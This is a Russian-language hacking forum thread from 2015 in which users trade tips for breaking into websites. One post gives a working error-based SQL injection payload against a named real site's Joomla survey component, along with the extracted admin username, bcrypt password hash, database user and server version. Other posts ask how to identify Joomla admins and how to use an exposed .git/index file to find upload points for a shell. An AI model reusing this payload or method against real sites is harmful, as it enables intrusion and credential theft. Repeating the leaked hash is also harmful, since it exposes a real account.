ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
13.11.2015, 01:56
|
|
Banned
Регистрация: 21.11.2007
Сообщений: 181
Провел на форуме:
1066435
Репутация:
1013
|
|
Сообщение от Br@!ns
Br@!ns said:
↑
или тот же mid. или тот же substr? это аналогичные функции, не обязательно упоминать каждую
|
|
|
17.11.2015, 05:40
|
|
Новичок
Регистрация: 19.04.2008
Сообщений: 6
Провел на форуме:
28766
Репутация:
34
|
|
Сообщение от Br@!ns
Br@!ns said:
↑
Зачем вы кавычку вконце поставили я вообще не пойму.
Unknown column 'root' in 'where clause'
Обычная ошибка бд, никакой sql inj
Код:
Code:
http://kvestsetevichok.ru/index.php?no_html=1&tmpl=component&option=com_surveyforce&task=survey.SF_ajaxAction
[POST]action=next&survey=1&start_id=21133&user_id=449c373991919e6a22eca19c18e4b11c&quest_id[]=21 or (select count(*) from information_schema.columns group by concat((select concat_ws(0x3a,substring(username,1,50),substring(password,1,50)) from nvehp_users limit 0,1),0x3a,floor(rand(0)*2)))--&answer[]=152
Duplicate entry 'main:$2y$10$I4IqeXwMb5JkzFTTvEXQW.r71Nq/14JJgiIk75jsSK1:1' for key 'group_key'
Duplicate entry '83195:1' for key 'group_key'
Duplicate entry 'sergrus_kvest15@localhost::5.5.36-34.0-632.prec::sergrus_kvest15'
|
|
|
|
17.11.2015, 12:32
|
|
Постоянный
Регистрация: 25.01.2009
Сообщений: 368
Провел на форуме:
5290740
Репутация:
912
|
|
какая колонка в таблице %_users определяет админа сайта в послених версиях джумлы?
в предыдущих было usertype=Super Administrator
|
|
|
|
19.11.2015, 21:34
|
|
Guest
Сообщений: n/a
Провел на форуме:
11344
Репутация:
5
|
|
Сообщение от SaNDER
SaNDER said:
↑
На сайте ASP при смене пароля поставил 8 кавычек и он успешно сохранил пароль,но не ошибок,нечего не было . Это нормально? . Ну так теперь попробуйте залогиниться и узнаете. А вообще - скорее нормально, чем нет.
|
|
|
|
20.11.2015, 12:49
|
|
Guest
Сообщений: n/a
Провел на форуме:
51198
Репутация:
3
|
|
Сообщение от AlexG
AlexG said:
↑
Ну так теперь попробуйте залогиниться и узнаете. А вообще - скорее нормально, чем нет. фишка в том,что я теперь не могу попасть в аккаунт .
|
|
|
|
22.11.2015, 23:11
|
|
Guest
Сообщений: n/a
Провел на форуме:
56255
Репутация:
2
|
|
нашел сайт, при переходе в .git/index скачивается файл
как заюзать? спасибо
|
|
|
|
22.11.2015, 23:15
|
|
Guest
Сообщений: n/a
Провел на форуме:
46989
Репутация:
20
|
|
скинь содержимое файла
|
|
|
|
22.11.2015, 23:24
|
|
Guest
Сообщений: n/a
Провел на форуме:
56255
Репутация:
2
|
|
Сообщение от Vip77
Vip77 said:
↑
скинь содержимое файла там в основном пути wp-content/plugins/ и т.д
|
|
|
|
23.11.2015, 00:12
|
|
Guest
Сообщений: n/a
Провел на форуме:
46989
Репутация:
20
|
|
в таких файлах бывает можно найти пути к интересным файлам, через которые можно залиться.
но если там только пути к плагинам, то вряд ли что-то можно сделать, кроме как проверить их на уязвимости
|
|
|
|
23.11.2015, 00:17
|
|
Guest
Сообщений: n/a
Провел на форуме:
56255
Репутация:
2
|
|
а если вот так сделать?
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
![Аватар для .:[melkiy]:.](/avatars/avatar74910.jpg?3916537){kind=avatar}
Линейный вид
